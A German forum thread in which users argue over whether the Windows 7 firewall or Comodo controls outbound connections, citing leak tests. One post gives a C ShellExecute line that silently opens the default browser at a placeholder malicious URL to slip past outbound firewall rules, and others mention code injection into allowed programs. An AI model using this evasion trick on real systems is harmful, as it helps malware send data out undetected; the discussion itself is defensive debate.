So, ich hab jetzt fleißig rumgespielt.
Es geht dir zwar um ausgehende Verbindungen aber egal. Da gab es früher schon Wege um auch andere PFWs, die ja angeblich so sicher auch ausgehende Verbindungen überwachen können zu überwinden.

Zitat:

die Win 7 Firewall würde reichen, nicht richtig ist,

Man muss über die Windows-Firewall mit erweiterter Sicherheit eine Regel anlegen, die zB leaktest.exe daran hindert, irgendwelche Verbindungen aufzubauen.

Führt man dann die leaktest.exe aus, kann sie nichts penetrieren wie sie so schön sagt siehe => http://saved.im/mtg5mjq5d2fy/auswahl_004.png

Allerdings darf man sie nicht mit Adminrechten ausführen, mit Adminrechten schafft sie es. Ist ja auch irgendwie logisch. Ein Schädling mit Adminrechten kann theoretisch auch alles überwinden.

So und nun? Was lernen wir daraus? Soll jetzt die Windows-Firewall jedes Programm ausgehend blockieren was nicht eplizit erlaubt ist? Oder soll eine unsinnige PFW jedes mal nachfragen wenn das kleinste Popelprogramm mal wieder nach Updates sucht? Beachte, wenn Programme im Kontext eines Admins laufen hast du ganz schlechte Karten mit einer Firewall, die auf dem zu überwachenden System selbst läuft.

Zitat:

Ich befürchte, die Windows Firewall wird keinen bestehen

Nach außen schottet die Windows-Firewall alles ab, ausgehenden Verkehr kann man wohl niemals auf diese Weise richtig blockieren.

Mal ne Frage, kann dein tolles COMODO sowas blockieren?

Code: Alles auswählenAufklappen

ATTFilter

ShellExecute(NULL, "open","http://www.poehseseite.com/XXX.php", NULL,NULL, SW_HIDE);
         

Das ruft deinen default Browser mit unsichtbarem Fenster auf und steuert eine böse Seite an, hier nen Artikel von MS dazu => Use ShellExecute to launch the default Web browser

Mal sehen was du dazu sagst.

Noch was: Man kann auch die Firewall so einstellen, dass standardmäßig nicht nur die ein- sondern auch die ausgehenden Verbindungen blockiert werden. Dann kann wirklich nur das nach außen kommunizieren können was auch explizit erlaubt ist.

Leaktest ging dann nicht mehr, auch mit Adminrechten nicht. Selbst mit dem IE konnte ich nicht mehr surfen. Hab dann eine Ausnahme für den Firefox gemacht, nur der konnte dann noch mit dem Netz kommunizieren

Siehe auch Firewall in Windows 7 optimal einstellen | com! - Das Computer-Magazin

Zitat:

Ich befürchte, die Windows Firewall wird keinen bestehen

Ich befürchte, dass deine Befürchtungen unbegründet sind

Zitat:

Es geht dir zwar um ausgehende Verbindungen aber egal.

Nein, das ist nicht egal.

Zitat:

Man muss über die Windows-Firewall mit erweiterter Sicherheit eine Regel anlegen, die zB leaktest.exe daran hindert, irgendwelche Verbindungen aufzubauen.

Führt man dann die leaktest.exe aus, kann sie nichts penetrieren wie sie so schön sagt siehe => hxxp://saved.im/mtg5mjq5d2fy/auswahl_004.png

Allerdings darf man sie nicht mit Adminrechten ausführen, mit Adminrechten schafft sie es. Ist ja auch irgendwie logisch. Ein Schädling mit Adminrechten kann theoretisch auch alles überwinden.

Kann doch nicht wirklich dein Ernst sein. FACEPALM

Zitat:

So und nun? Was lernen wir daraus? Soll jetzt die Windows-Firewall jedes Programm ausgehend blockieren was nicht eplizit erlaubt ist?

Ja, ganz genau das sollte eine FW machen.

Zitat:

Nach außen schottet die Windows-Firewall alles ab, ausgehenden Verkehr kann man wohl niemals auf diese Weise richtig blockieren.

Mal ne Frage, kann dein tolles COMODO sowas blockieren?

Die Windows Firewall kann es offensichtlich nicht.

Wenigstens Blockt die Comodo Firewall ausgehenden Verkehr für Programme die keine Regeln haben, ohne das man vorher was einstellen muß.

Zitat:

Das ruft deinen default Browser mit unsichtbarem Fenster auf und steuert eine böse Seite an, hier nen Artikel von MS dazu => Use ShellExecute to launch the default Web browser

Mal sehen was du dazu sagst.

Was soll ich dazu sagen?

Zitat:

Noch was: Man kann auch die Firewall so einstellen, dass standardmäßig nicht nur die ein- sondern auch die ausgehenden Verbindungen blockiert werden. Dann kann wirklich nur das nach außen kommunizieren können was auch explizit erlaubt ist.

Leaktest ging dann nicht mehr, auch mit Adminrechten nicht. Selbst mit dem IE konnte ich nicht mehr surfen. Hab dann eine Ausnahme für den Firefox gemacht, nur der konnte dann noch mit dem Netz kommunizieren

Macht das in deinen Augen wirklich Sinn?

Zitat:

Ich befürchte, dass deine Befürchtungen unbegründet sind

Ich befürchte, dass du einfach nur auf deiner Meinung bestehen möchtest. Da spielt es für dich auch keine Rolle, dass die Windows Firewall nicht einen einzigen Leaktest besteht, ohne dass man auf irgendwelchen Webseiten Tutorials zum richtigen Einstellen macht.

Nur leider hast du das dem User, dem du die Windows Firewall quasi aufgedrängt hast, nicht gesagt, dass sie ohne die nötigen Einstellungen absolut keinen Schutz für ausgehenden Verkehr bietet. Hast du das einfach nur im Stress vergessen? Du hast ihm schließlich ausdrücklich gesagt, sie sei sicher, und dass er sie nichtmal bräuchte, wenn er hinter einen Router sitzt.

Lernt man das so im Kompetenzteam?

Also, was war jetzt falsch? Dem User die Firewall von Windows zu empfehlen und ihm eine viel bessere auszureden, oder dass du vergessen hast ihm zu sagen, dass er sie erst noch "richtig" einstellen muß?

Du hast die Windows Firewall empfohlen, ohne über sie bescheid zu wissen, das geht ja klar aus deinen Posts hervor. Besonders deine letzten beiden Posts zeugen von wenig Kompetenz, dafür aber von viel Ego. Weil nicht sein kann, was nicht sein darf. Du hast diese Firewall schließlich immer empfohlen, also muß sie gut sein.


hxxp://www.tecchannel.de/sicherheit/spam/2030120/schutz_vor_angriffen_ratgeber_personal_firewalls_fuer_windows_7/index3.html

Zitat:

Nein, das ist nicht egal.

Begründung? Oder hast du keine?

Zitat:

Kann doch nicht wirklich dein Ernst sein. FACEPALM

FACEPALM ist es, ständig mit Adminrechten drin zu sein und zu erwarten, dass man immer noch höchste Sicherheit genießt. Ich glaube du hast etwas Grundlegendes nicht verstanden.

Zitat:

Die Windows Firewall kann es offensichtlich nicht.
Wenigstens Blockt die Comodo Firewall ausgehenden Verkehr für Programme die keine Regeln haben, ohne das man vorher was einstellen muß.

Wusste ich es doch. Bestehende Regeln die zB den default Browser betreffen kann deine tolle COMODO also auch nicht überwachen
Wenn man sie mal konfigurieren täte, könnte die WinFirewall auch alles ausgehende bis auf das Erlaubte blocken, aber wer ständig OUTBOUND Traffic überwachen/kontrollieren will leidet an etwas anderes und traut auch seiner Kiste hinten und vorne nicht mehr.
Du brauchst nur die Windows-Firewall zum Abschotten der Dienste.
Sobald du auch nur eine Regel hast, die ausgehenden Verkehr erlaubt ist das Konzept schon fast hinfällig. Siehe default Browser. Egal ob deine heiß geliebte COMODO Software, Windows-Firewall mit erweiteren Einstellungen oder sonstwas.
Dafür hat die WinFirewall einen entscheidenden Vorteil: sie ist so oder so im Betriebssystem von Windows integriert ob du willst oder nicht, Updates direkt vom Hersteller über Windows-Update.
Aber Systeme nicht unnötig komplexer zu machen, lernst du vllt im nächsten Kapitel nachdem du mal ein paar Grundlagen vorher gelesen und auch verstanden hast

Zitat:

Was soll ich dazu sagen?

Eben, garnix!
Weil deine COMODO das ja auch nicht unterbinden kann!

Zitat:

Macht das in deinen Augen wirklich Sinn?

Du bist echt witzig, dass ich dir damit verdeutlichen wollte, dass eben nur das nach außen über die WinFirewall kommunizieren kann was ich auch klar definiert habe ist wohl gepflegt an dir vorbeigegangen was?

Zitat:

dass sie ohne die nötigen Einstellungen absolut keinen Schutz für ausgehenden Verkehr bietet.

Nochmal: ausgehenden Verkehr kann man nicht zuverlässig kontrollieren/unterbinden. Prinzipbdingt schon nicht. Diese ganze Rumtesterei in der VM hab ich nur für dich gemacht weil du ja nicht glauben wolltest, dass die WinFirewall dein billig leaktest.exe niemals nicht aufhalten könnte

Zitat:

Lernt man das so im Kompetenzteam?

Lernt man die Hysterie ausgehenden Verkehr zu überwachen in der Softwareindustrie/Marketing?
Aber setzt ruhig mal nur auf dein straffes Regelwerk deines Spielzeugs, das allein reicht ja, kann dir ja nichts mehr passieren

Zitat:

dass er sie erst noch "richtig" einstellen muß?

Schon klar, rundum-Sorglos-Pakete wie COMODO müssen ja nur installiert werden, keine Spur von Konfig, jeder Depp installiert es sich und fortan ist ja alles sicher, weil sie ja immer nachfragt und den normalen Nutzer wie Oma Else ja auch absolut nicht überfordert wenn mal wieder svchost.exe ins Internet will

Sry aber mit deinem Posting hast du dich jetzt echt vergriffen, deine primitiven Versuche, das Kompetenzteam zu diffamieren sind einfach nur armselig.
Für eine sichere Konfig reicht es immer aus, eingehende Verbindungen zu blockieren bzw. keine Dienste nach außen hin anzubieten.
Wenn irgendwas ausgehend schlimmes passiert liegt der Fehler schon irgendwo davor und da kann dich in einem Ernstfall weder die Windows-Firewall noch irgendein anderes Spielzeug wie dein heiß geliebtes COMODO davor bewahren

Aber wie gesagt, das lernst du nachdem du dir mal ein paar Grundlagen angeeignet hast und dieses peinliche Marketinggeblubber ablegst

Nur noch peinlich, was du von dir gibst. Zitierst ein paar Schnipsel aus meinem Post, und spielst dich hier als Kompetenzteammember auf.


Nur hierzu hast du gar nichts gesagt. Warum wohl? Übersehen? Ich habs für dich mal größer gemacht.

Nur leider hast du das dem User, dem du die Windows Firewall quasi aufgedrängt hast, nicht gesagt, dass sie ohne die nötigen Einstellungen absolut keinen Schutz für ausgehenden Verkehr bietet. Hast du das einfach nur im Stress vergessen? Du hast ihm schließlich ausdrücklich gesagt, sie sei sicher, und dass er sie nichtmal bräuchte, wenn er hinter einen Router sitzt.



Also, was war jetzt falsch? Dem User die Firewall von Windows zu empfehlen und ihm eine viel bessere auszureden, oder dass du vergessen hast ihm zu sagen, dass er sie erst noch "richtig" einstellen muß?

Antworte mal hier drauf.

*Nicht wundern, wenn deine grandiosen Tipps demnächst in einem anderen Forum auftauchen. Es ist nur fair wenn andere auch an deinem Fachwissen teilhaben dürfen. You made my Day.

Zitat:

Antworte mal hier drauf.

Ehrlich gesagt hab ich keine Lust mich ständig hier zu wiederholen. Lies einfach nochmal meinen Beitrag richtig und was das Ganze mit dem ausgehenden Traffic überhaupt für einen Sinn haben soll.

Und nochmal zum Mitmeißeln: Die Standardsettings der Windows-Firewall sind sicher, von außen (WAN) gibt es keine Möglichkeit auf einen Dienst des Win7-Rechners zuzugreifen.

Zitat:

und spielst dich hier als Kompetenzteammember auf.

Als was du dich hier aufspielst, behalte ich jetzt noch lieber für mich

Immer noch ungeklärte Punkte, wo ich von dir Firewallprofi keine Stellungnahme zu bekommen hab außer vllt "was soll ich dazu sagen"

• FACEPALM ist es, ständig mit Adminrechten drin zu sein
• will leidet an etwas anderes und traut auch seiner Kiste hinten und vorne nicht mehr
• Sobald du auch nur eine Regel hast, die ausgehenden Verkehr erlaubt ist das Konzept schon fast hinfällig. Siehe default Browser. Egal ob deine heiß geliebte COMODO Software, Windows-Firewall mit erweiteren Einstellungen oder sonstwas.
• Eben, garnix! Weil deine COMODO das ja auch nicht unterbinden kann!
• weil du ja nicht glauben wolltest, dass die WinFirewall dein billig leaktest.exe niemals nicht aufhalten könnte
• in einem Ernstfall weder die Windows-Firewall noch irgendein anderes Spielzeug wie dein heiß geliebtes COMODO davor bewahren

Zitat:

*Nicht wundern, wenn deine grandiosen Tipps demnächst in einem anderen Forum auftauchen. Es ist nur fair wenn andere auch an deinem Fachwissen teilhaben dürfen. You made my Day.

Das Vergnügen ist ganz auf meiner Seite

Nur leider hast du das dem User, dem du die Windows Firewall quasi aufgedrängt hast, nicht gesagt, dass sie ohne die nötigen Einstellungen absolut keinen Schutz für ausgehenden Verkehr bietet. Hast du das einfach nur im Stress vergessen? Du hast ihm schließlich ausdrücklich gesagt, sie sei sicher, und dass er sie nichtmal bräuchte, wenn er hinter einen Router sitzt.



Also, was war jetzt falsch? Dem User die Firewall von Windows zu empfehlen und ihm eine viel bessere auszureden, oder dass du vergessen hast ihm zu sagen, dass er sie erst noch "richtig" einstellen muß?

Bitte hör auf zu schreien, du bist hier nicht zuhause.

Ich glaube du missverstehst (u.a.) den Forengegenstand.
Es geht hier darum, wie kann ein normaler, rechtschaffener normaler Computerbenutzer sich und seinen PC möglichst effektiv vor Computermalware schützen.
Es geht nicht darum, wie ein Computerkiddy scheinbar effektiv und unerkannt illegale Software nutzen, verbreiten und herunterladen oder "anonym" in Foren u.ä. seine Meinungen und Ansichten verbreiten kann etc.
Ich habe schwer den Eindruck, dass dies aber dein Fokus ist.
Da bist du hier aber falsch und es ist ein unpraktikabler und falscher Ansatz um einen PC vor Malware zu schützen.

Zitat:

Ich habe schwer den Eindruck, dass dies aber dein Fokus ist.

Zudem kann er nicht auf meine o.g. Punkte eingehen weil die Argumentation da nicht mehr ausreicht
Statt Argumentation, Stellungnahme zu ungeklärten Punkten wiederholt man sich lieber und damit's anders aussieht variiert man die Textformatierung

Die gesamte Diskussion verläuft ohnehin im Sande, wenn man die Ausgangssituation betrachtet. Warum denn den Feind ins Haus lassen, um ihn dann einzusperren und den Kontakt nach Außen zu verbieten.

Shadow hat es schon angedeutet. Sinn und Zweck sollte es sein, die Malware gar nicht erst ins System zu lassen, dann braucht man sich folglich auch keiner Sorgen machen, was sie machen könnte, wenn sie im System ist. Andersherum ist es ein falscher Denkansatz. Auch wenn das Argument stimmen mag, dass eine Firewall einen dann vor schlimmeren bewahren könnte, wenn doch mal ein Schädling auf dem Rechner landet, birgt dieser Ansatz dennoch einige Gefahren. Viele Nutzer neigen dazu sich dann sicher zu fühlen, was sie mit einer Firewall aber nicht unbedingt sind, da es für Malware Möglichkeiten gibt, diese zu umgehen. Zudem ist es, wie Cosinus bereits erwähnt hat, nicht so einfach eine Firewall richtig zu bedienen, wenn man nicht schon etwas mehr Erfahrung mit Computern hat.

MfG, Kaos

Zitat:

Warum denn den Feind ins Haus lassen, um ihn dann einzusperren und den Kontakt nach Außen zu verbieten.

Eben. Darauf ist unser kleiner spitzohriger Gutgü-Tiger ja nicht eingegangen

Zitat:

dass eine Firewall einen dann vor schlimmeren bewahren könnte

Nur theoretisch. "Dumme" Malware wird an sowas wie Comodo scheitern, aber was "intelligenteres" wird seine Daten über irgendeinen Mechanismus senden, der ausgehend sowieso erlaubt sein muss, also einer oder mehreren Regeln mit der man erst quasi internetten kann. Siehe auch diesen dokumentierten Trick mit dem versteckten Standardbrowser, wo sensible Daten in beide Richtungen verarbeitet werden können. Aber das hat unser Schlingel ja ebenfalls mit keinem Kommentar gewürdigt,...

Wer so eine Panik hat, will mit einer PFW nur sein Gewissen beruhigen.

zumal malware eh über code injektion arbeitet und so den traffic evtl. über schon erlaubte Programme sendet, firefox, iexplore, what ever.
Comodo mag ein gutes Programm sein, obwohl ich das Verhalten von dieser firma sehr merkwürdig finde...
Comodo agrees to pay $50,000 to AV-Comparatives.org for test auditing & validation | MELIH ABDULHAYOGLU - Internet Security and Trust
da möchte man einem unabhängigem tester geld bezahlen... das ist schon mal ein wenig merkwürdig, aber egal.
aber man kann es eben auch nur bedienen, wenn man fachwissen mitbringt, so ist die Verhaltensanalyse nicht mal in der Lage, rootkits wie Zero access in der Standard konfiguration zu blockieren, obwohl meldungen angezeigt werden.
außerdem, wofür brauchen private Nutzer schon eine Firewall, die sind doch höchstens mal nem Portscan ausgesetzt und das ist nichts gefährliches.
Wenn man mal guckt, was pfw's so anzeigen, ist das doch meist nur blödsinn für jeden kleinen mumpitz, um dem Nutzer eine Scheinsicherheit vorzugaukeln, aber die waren Probleme werden nicht angegangen, arbeiten als Admin, klaffene Sicherheitslücken usw.
Wenn man dann häufig das Argument liest, aber ich muss doch wissen welches Programm nach hause telefoniert, frage ich mich, warum instaliert man sich Programme, den man nicht vertraut? und, wer gibt einem die Garantie, das die Desktop Firewall tatsächlich alles blockt?
edit:
Überschneidungen mit Arne waren nicht beabsichtigt. :-)

Zitat:

zumal malware eh über code injektion arbeitet und so den traffic evtl. über schon erlaubte Programme sendet, firefox, iexplore, what ever.

Jap, outbound traffic ist prinzipbedingt nicht kontrollierbar jedenfalls nicht in dieser Granularität wie sich unser Firewall-Profi Grundgü-Tiger das vorstellt.

Zitat:

außerdem, wofür brauchen private Nutzer schon eine Firewall, die sind doch höchstens mal nem Portscan ausgesetzt und das ist nichts gefährliches

Das blockt die Windows-Firewall in den Standardeinstellungen, es ist auch ohne Router nicht möglich auf eine Windows-Kiste zuzugreifen. Mehr braucht es nicht. Weniger ist mehr und auch besser in diesem Fall. Wenn man mal die aktuellen Meldungen beobachtet ist es wohl sogar komplett ohne Router sicherer => Viele Router-Lücken, wenig Patches | heise online

Hi,
ja, obwohl ich eh das Gefühl habe, Heise macht aus den Router News einen Hype, vorher hat sich doch auch keiner interessiert, ob sein Router die aktuellste Firmware hatt, is ja wie beim Windows System.
Es ist aber schon ein Trauerspiel, dass man Hersteller durch veröffendlichung von Problemen dazu zwingen muss, Updates rauszubringen.
Edit: war jetzt nicht unbedingt bezogen auf Grundgütiger.
nur meine 2Pfennig zur Software Firewall.
Bei Hardware Firewalls mag das, evtl. anders aussehen, da die vom eigendlichem System getrennt ist, aber da kann ich aufgrund mangelner Kenntniss nicht mitreden.